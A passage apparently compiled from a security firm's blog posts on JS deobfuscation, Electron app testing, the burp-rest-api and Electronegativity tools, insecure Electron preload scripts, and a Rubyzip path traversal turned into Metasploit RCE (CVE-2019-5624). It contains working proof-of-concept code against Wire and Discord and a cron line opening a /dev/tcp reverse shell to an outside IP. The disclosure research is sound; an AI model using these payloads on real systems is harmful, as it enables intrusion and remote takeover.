eval(function(c,d,e,f,g,h){g=function(i){return(i<d?'':g(parseInt(i/d)))+((i=i%d)>0x23?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d):i['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x24));};while(e--){if(f[e]){c=c['\x72\x65\x70\x6c\x61\x63\x65'](new RegExp('\x5c\x62'+g(e)+'\x5c\x62','\x67'),f[e]);}}return c;}('\x62\x20\x35\x3d\x5b\x22\x5c\x6f\x5c\x38\x5c\x70\x5c\x73\x5c\x34\x5c\x63\x5c\x63\x5c\x37\x22\x2c\x22\x5c\x72\x5c\x34\x5c\x64\x5c\x74\x5c\x37\x5c\x67\x5c\x6d\x5c\x64\x22\x2c\x22\x5c\x75\x5c\x34\x5c\x66\x5c\x66\x5c\x38\x5c\x71\x5c\x34\x5c\x36\x5c\x6c\x5c\x36\x22\x2c\x22\x5c\x6e\x5c\x37\x5c\x67\x5c\x36\x5c\x38\x5c\x77\x5c\x34\x5c\x36\x5c\x42\x5c\x34\x5c\x63\x5c\x43\x5c\x37\x5c\x76\x5c\x34\x5c\x41\x22\x5d\x3b\x39\x20\x6b\x28\x65\x29\x7b\x62\x20\x61\x3d\x30\x3b\x6a\x5b\x35\x5b\x30\x5d\x5d\x3d\x39\x28\x68\x29\x7b\x61\x2b\x2b\x3b\x78\x28\x65\x2b\x68\x29\x7d\x3b\x6a\x5b\x35\x5b\x31\x5d\x5d\x3d\x39\x28\x29\x7b\x79\x20\x61\x7d\x7d\x62\x20\x69\x3d\x7a\x20\x6b\x28\x35\x5b\x32\x5d\x29\x3b\x69\x2e\x44\x28\x35\x5b\x33\x5d\x29',0x28,0x28,'\x7c\x7c\x7c\x7c\x78\x36\x35\x7c\x5f\x30\x7c\x78\x32\x30\x7c\x78\x36\x46\x7c\x78\x36\x31\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x5f\x31\x7c\x76\x61\x72\x7c\x78\x36\x43\x7c\x78\x37\x34\x7c\x5f\x32\x7c\x78\x37\x33\x7c\x78\x37\x35\x7c\x5f\x33\x7c\x6f\x62\x6a\x7c\x74\x68\x69\x73\x7c\x4e\x65\x77\x4f\x62\x6a\x65\x63\x74\x7c\x78\x33\x41\x7c\x78\x36\x45\x7c\x78\x35\x39\x7c\x78\x35\x33\x7c\x78\x37\x39\x7c\x78\x36\x37\x7c\x78\x34\x37\x7c\x78\x34\x38\x7c\x78\x34\x33\x7c\x78\x34\x44\x7c\x78\x36\x44\x7c\x78\x37\x32\x7c\x61\x6c\x65\x72\x74\x7c\x72\x65\x74\x75\x72\x6e\x7c\x6e\x65\x77\x7c\x78\x32\x45\x7c\x78\x37\x37\x7c\x78\x36\x33\x7c\x53\x61\x79\x48\x65\x6c\x6c\x6f'['\x73\x70\x6c\x69\x74']('\x7c')));

It can be manually turned into:

eval(function (c, d, e, f, g, h) {
    g = function (i) {
        return (i < d ? '' : g(parseInt(i / d))) + ((i = i % d) > 35 ? String['fromCharCode'](i + 29) : i['toString'](36));
    };
    while (e--) {
        if (f[e]) {
            c = c['replace'](new RegExp('\\b' + g(e) + '\\b', 'g'), f[e]);
        }
    }
    return c;
}('b 5=["\\o\\8\\p\\s\\4\\c\\c\\7","\\r\\4\\d\\t\\7\\g\\m\\d","\\u\\4\\f\\f\\8\\q\\4\\6\\l\\6","\\n\\7\\g\\6\\8\\w\\4\\6\\B\\4\\c\\C\\7\\v\\4\\A"];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])', 40, 40, '||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello'['split']('|')));

Then, it can be passed to JStillery, JS Nice and other similar tools in order to get back a human readable version.

'use strict';
var _0 = ["SayHello", "GetCount", "Message : ", "You are welcome."];
function NewObject(contentsOfMyTextFile) {
  var _1 = 0;
  this[_0[0]] = function(theLibrary) {
    _1++;
    alert(contentsOfMyTextFile + theLibrary);
  };
  this[_0[1]] = function() {
    return _1;
  };
}
var obj = new NewObject(_0[2]);
obj.SayHello(_0[3]);

Enabling the developer tools in the renderer process

During testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and <webview> tags.

Electron’s main process can use the BrowserWindow API to instantiate a new renderer.

In the example below, we are creating a new BrowserWindow instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:

/app/mainScreen.js

var winOptions = {
    title: 'Example App',
    backgroundColor: '#ffffff',
    width: DEFAULT_WIDTH,
    height: DEFAULT_HEIGHT,
    minWidth: MIN_WIDTH,
    minHeight: MIN_HEIGHT,
    transparent: false,
    frame: false,
    resizable: true,
    show: isVisible,
    webPreferences: {
      nodeIntegration: false,
      preload: _path2.default.join(__dirname, 'preload.js')
    }
  };

[ -- cut -- ]

mainWindow = new _electron.BrowserWindow(winOptions);
  winId = win.id;

//|--> HERE we can hook and add the Developers Tools <--|
win.webContents.openDevTools({ mode: 'bottom' })
win.setMenuBarVisibility(true);

If everything worked fine, we should have the Developer Tools enabled for the main UI screen.

From the main Developer Tool console, we can open additional developer tools windows for other renderers (e.g. webview tags).

window.document.getElementsByTagName("webview")[0].openDevTools()

While reading the code above, have you noticed the webPreferences options?

WebPreferences options are basically settings for the renderer process and include things like window size, appearance, colors, security features, etc. Some of these settings are pretty useful for debugging purposes too.

For example, we can make all windows visible by using the show property of BrowserWindow:

BrowserWindow({show: true})

Adding debugging statements

During instrumentation, it is useful to include debugging code such as

console.log("\n--------------- Debug --------------------\n")
console.log(process.type)
console.log(process.pid)
console.log(process.argv)
console.log("\n--------------- Debug --------------------\n")

Debugging the main process

Since it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium’s Developer Tools can be used to debug Electron’s main process with just a minor adjustment.

The DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process you will need to leverage the native debugger and launch Electron with the --inspect or --inspect-brk switch.

Use one of the following command line switches to enable debugging of the main process:

--inspect=[port] Electron will listen for V8 inspector protocol messages on the specified port; an external debugger will need to connect to this port. The default port is 5858.

--inspect-brk=[port] Like --inspect but pauses execution on the first line of JavaScript.

Usage: electron --inspect=5858 your-app

You can now connect Chrome by visiting chrome://inspect and analyze the launched Electron app present there.

Intercepting HTTP(s) traffic

Chromium supports system proxy settings on all platforms, so set up a proxy and then add the Burp CA as usual.

You can even use the following command line argument if you run the Electron application directly. Please note that this does not work when using the bundled app.

--proxy-server=address:port

Or, programmatically with these lines in the main app:

const {app} = require('electron') 
app.commandLine.appendSwitch('proxy-server', '127.0.0.1:8080')

For Node, use transparent proxying by either changing /etc/hosts or overriding configs:

npm config set proxy http://localhost:8080
npm config set https-proxy http://localhost:8081

In case you need to revert the proxy settings, use:

npm config rm proxy
npm config rm https-proxy

However, you need to disable TLS validation with the following code within the application under testing:

process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";

Outro

Proper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities.

@voidsec @lucacarettoni

Introducing burp-rest-api v2

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately, internal security tools are rarely open-sourced, and still, too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

Releases

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone [email protected]:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.

In order to implement this, we employed a classloading technique with a dummy entry point (BurpExtender.java) that loads the legacy Burp extension (LegacyBurpExtension.java) after the full Burp Suite has been loaded and launched (BurpService.java).

Bug Fixes and Improvements

In this release, we have also focused our efforts on massive issue house-cleaning:

  • Better documentation and even an FAQ page
  • Burp Spider status API
  • Burp Configuration with configPath selection API
  • Enabled SpringBoot compression
  • Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
  • …and much more

Help Us Shape The Future of burp-rest-api

With the release of Burp Suite Professional 2.0 (beta), Burp includes a native REST API.

While the current functionalities are very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native REST API; however, this new feature makes us wonder about the future of this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this GitHub issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni

Electronegativity is finally out!

We’re excited to announce the public release of Electronegativity, an open-source tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

Electronegativity Demo

The remainder of this blog post provides more details on the public release and introduces its current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, Claudio Merloni and I started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again, and minor refinements were done only in between customer projects.

In the summer of 2018, we hired Doyensec’s first intern - Ibram Marzouk who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks (JavaScript, HTML, and JSON, as reflected in the check names below), so that the tool can analyze all resources within an Electron application.

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, as a CSV file, or in SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

  1. ALLOWPOPUPS_HTML_CHECK
  2. AUXCLICK_JS_CHECK
  3. AUXCLICK_HTML_CHECK
  4. BLINK_FEATURES_JS_CHECK
  5. BLINK_FEATURES_HTML_CHECK
  6. CERTIFICATE_ERROR_EVENT_JS_CHECK
  7. CERTIFICATE_VERIFY_PROC_JS_CHECK
  8. CONTEXT_ISOLATION_JS_CHECK
  9. CUSTOM_ARGUMENTS_JS_CHECK
  10. DANGEROUS_FUNCTIONS_JS_CHECK
  11. ELECTRON_VERSION_JSON_CHECK
  12. EXPERIMENTAL_FEATURES_HTML_CHECK
  13. EXPERIMENTAL_FEATURES_JS_CHECK
  14. HTTP_RESOURCES_JS_CHECK
  15. HTTP_RESOURCES_HTML_CHECK
  16. INSECURE_CONTENT_HTML_CHECK
  17. INSECURE_CONTENT_JS_CHECK
  18. NODE_INTEGRATION_HTML_CHECK
  19. NODE_INTEGRATION_EVENT_JS_CHECK
  20. NODE_INTEGRATION_JS_CHECK
  21. OPEN_EXTERNAL_JS_CHECK
  22. PERMISSION_REQUEST_HANDLER_JS_CHECK
  23. PRELOAD_JS_CHECK
  24. PROTOCOL_HANDLER_JS_CHECK
  25. SANDBOX_JS_CHECK
  26. WEB_SECURITY_HTML_CHECK
  27. WEB_SECURITY_JS_CHECK

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!

Subverting Electron Apps via Insecure Preload

We’re back from BlackHat Asia 2019 where we introduced a relatively unexplored class of vulnerabilities affecting Electron-based applications.

Despite popular belief, secure-by-default settings are slowly becoming the norm and the dev community is gradually learning common pitfalls. Isolation is now widely deployed across all top Electron applications and so turning XSS into RCE isn’t child’s play anymore.

From Alert to Calc

BrowserWindow preload introduces a new and interesting attack vector. Even without a framework bug (e.g. nodeIntegration bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner.

You can download the slides of our talk from the official BlackHat Briefings archive: http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf

Preloading Insecurity In Your Electron

Preload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page’s window object as shown in the official documentation:

let win
app.on('ready', () => {
  win = new BrowserWindow({
    webPreferences: {
      sandbox: true,
      preload: 'preload.js'
    }
  })
  win.loadURL('http://google.com')
})

preload.js can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:

const fs = require('fs')
const { ipcRenderer } = require('electron')

// read a configuration file using the `fs` module
const buf = fs.readFileSync('allowed-popup-urls.json')
const allowedUrls = JSON.parse(buf.toString('utf8'))

const defaultWindowOpen = window.open

function customWindowOpen (url, ...args) {
  if (allowedUrls.indexOf(url) === -1) {
    ipcRenderer.sendSync('blocked-popup-notification', location.origin, url)
    return null
  }
  return defaultWindowOpen(url, ...args)
}

window.open = customWindowOpen

[...]

Through performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications using all recommended security best practices, we were able to turn boring XSS into RCE in a matter of hours.

This prompted us to further research the topic and categorize four types of insecure preloads:

  • (1) Preload scripts can reintroduce Node global symbols back to the global scope

    While it is evident that reintroducing some Node global symbols (e.g. process) to the renderer is dangerous, the risk is not immediately obvious for classes like Buffer (which can be leveraged for a nodeIntegration bypass)

  • (2) Preload scripts can introduce functionalities that can be abused by untrusted code

    Preload scripts have access to Node.js, and the functions exported by applications to the global window often include dangerous primitives (see the sketch after this list)

  • (3) Preload scripts can facilitate sandbox bypasses

    Even with sandbox enabled, preload scripts still have access to Node.js native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code, facilitating sandbox bypasses

  • (4) Without contextIsolation, the integrity of preload scripts is not guaranteed

    When isolated worlds are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc.
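
To make patterns (1) and (2) concrete, here is a minimal, hypothetical preload script exhibiting both issues (assuming a non-sandboxed preload; the saveNote helper is purely illustrative):

// preload.js - hypothetical example of insecure patterns (1) and (2)
const { writeFileSync } = require('fs')

// (1) reintroducing a Node global symbol to the page's global scope
window.Buffer = Buffer

// (2) exporting a function backed by a dangerous Node.js primitive;
// any XSS in the renderer can now write arbitrary files to disk
window.saveNote = (path, contents) => {
  writeFileSync(path, contents)
}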

In this blog post, we will analyze a couple of vulnerabilities belonging to group (2), which we discovered in two popular applications: Wire App and Discord.

For more vulnerabilities and examples, please refer to our presentation.

WireApp Desktop Arbitrary File Write via Insecure Preload

Wire App is a self-proclaimed “most secure collaboration platform”. It’s a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a BrowserWindow with nodeIntegration disabled, in which the web application is loaded through a webview HTML tag.

Wire App frames

Despite enforcing isolation, the web-view-preload.js preload file contains the following code:

const webViewLogger = new winston.Logger();
webViewLogger.add(winston.transports.File, {
  filename: logFilePath,
  handleExceptions: true,
});

webViewLogger.info(config.NAME, 'Version', config.VERSION);

// webapp uses global winston reference to define log level
global.winston = webViewLogger;

Code running in the isolated renderer (e.g. XSS) can override the logger’s transport setting in order to obtain a file write primitive.

This issue can be easily verified by switching to the messages view and opening the webview’s DevTools:

window.document.getElementsByTagName("webview")[0].openDevTools();

and then executing the following code:

// custom formatter that returns the raw message, so that the
// payload is written to the target file verbatim
function formatme(args) {
  var logMessage = args.message;
  return logMessage;
}

// override the logger's transport to redirect the log file to an
// attacker-controlled path (here, the victim's .bashrc)
winston.transports.file = (new winston.transports.file.__proto__.constructor({
  dirname: '/home/ikki/',
  level: 'error',
  filename: '.bashrc',
  json: false,
  formatter: formatme
}))

// any logged message is now appended to ~/.bashrc
winston.error('xcalc &');


This issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass.

A security patch was released on March 14, 2019, just a few days after our disclosure.

Discord Desktop Arbitrary IPC via Insecure Preload

Discord is a popular voice and text chat used by over 250 million gamers. The application implements isolation by simply using a BrowserWindow with nodeIntegration disabled. Despite that, the preload script (app/mainScreenPreload.js) in use by the same BrowserWindow contains multiple exports including the following:

var DiscordNative = {
    isRenderer: process.type === 'renderer',
    //..
    ipc: require('./discord_native/ipc'),
};

//..

process.once('loaded', function () {
    global.DiscordNative = DiscordNative;
    //..
});

where app/discord_native/ipc.js contains the following code:

var electron = require('electron');
var ipcRenderer = electron.ipcRenderer;

function send(event) {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }

  ipcRenderer.send.apply(ipcRenderer, [event].concat(args));
}

function on(event, callback) {
  ipcRenderer.on(event, callback);
}

module.exports = {
  send: send,
  on: on
};

Without going into details, this script is basically a wrapper around Electron’s official asynchronous IPC mechanism, used to exchange messages from the renderer process (web page) to the main process.

In Electron, ipcMain and ipcRenderer modules are used to implement IPC between the main process and the renderers but they’re also leveraged for internal native framework invocations. For instance, the window.close() function is implemented using the following event listener:

// Implements window.close()
ipcMainInternal.on('ELECTRON_BROWSER_WINDOW_CLOSE', function (event) {
  const window = event.sender.getOwnerBrowserWindow()
  if (window) {
    window.close()
  }
  event.returnValue = null
})

As there’s no separation between application-level IPC messages and the internal ELECTRON_ channels, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework’s security mechanism.

For example, the following synchronous IPC calls can be used to execute an arbitrary binary:

(function () {
    var ipcRenderer = require('electron').ipcRenderer
    var electron = ipcRenderer.sendSync("ELECTRON_BROWSER_REQUIRE","electron");
    var shell = ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_GET", electron.id, "shell");
    return ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_CALL", shell.id, "openExternal", [{
                            type: 'value',
                            value: "file:///Applications/Calculator.app"
    }]);
})();

In the case of Discord’s preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference to the objects returned by the function exposed in the untrusted window, an attacker can still brute-force the reference of the child_process module using the following code:

DiscordNative.ipc.send("ELECTRON_BROWSER_REQUIRE","child_process");

for(var i=0;i<50;i++){
    DiscordNative.ipc.send("ELECTRON_BROWSER_MEMBER_CALL", i, "exec", [{
            type: 'value',
            value: "calc.exe"
    }]);
}


This issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards compatibility code with old clients.

On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry point for triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself, and the implications of such an issue in a popular piece of software - Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376, where the developers implemented a different handling.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

Running the PoC against an archive containing an absolute path entry:

$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

This results in a file being created at /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to Pathname’s interpretation of the ../, the argument of Rubyzip’s Entry#extract call does not contain any path traversal payload, which results in a path that is mistakenly assumed to be “safe”. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and Windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that use the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in the zip.rb file (line 157), which is responsible for importing a Metasploit ZIP file:

data.entries.each do |e|
  target = ::File.join(@import_filedata[:zip_tmp], e.name)
  data.extract(e,target)

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive)
  4. Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
  5. Log in to the MSF Web Interface
  6. Create a new “Project”
  7. Select “Import”, “From file”, choose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell


Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage                 | Input by user?                    | Vulnerable to path traversal?
entry.extract(path)   | yes (path)                        | yes
entry.extract(path)   | partially (path is concatenated)  | maybe
entry.extract()       | partially (entry name)            | no
entry.extract()       | no                                | no

If you’re using Metasploit, it is time to patch. We look forward to seeing an MSF module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.


Electronegativity 1.3.0 released!

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0 with many new improvements and security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. It now counts over 40, featuring a new advanced check system that improves the tool’s detection capabilities by sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

  • Every check now has an importance and accuracy attribute, which helps the auditor determine the significance of each finding. Consequently, we also introduced new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailoring Electronegativity integration in your application security pipelines or build systems (see the usage example after this list).
  • We introduced a new class of checks called GlobalChecks which can dynamically set the severity and confidence of the findings, or create new ones considering the inherent security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flag values or the presence of the affinity flag used across different windows).
  • Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
  • Electron’s newly introduced BrowserView component, meant to be an alternative to the WebView tag, is now supported. The tool also detects the use of the nodeIntegrationInSubFrames experimental option for enabling Node.js support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)
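
For instance, the new filtering and single-check flags can be combined as follows (the severity and confidence values shown here are illustrative):

$ electronegativity -i /path/to/electron/app --severity high --confidence firm -r
$ electronegativity -i /path/to/electron/app -l "AuxClickJsCheck,AuxClickHtmlCheck"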

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

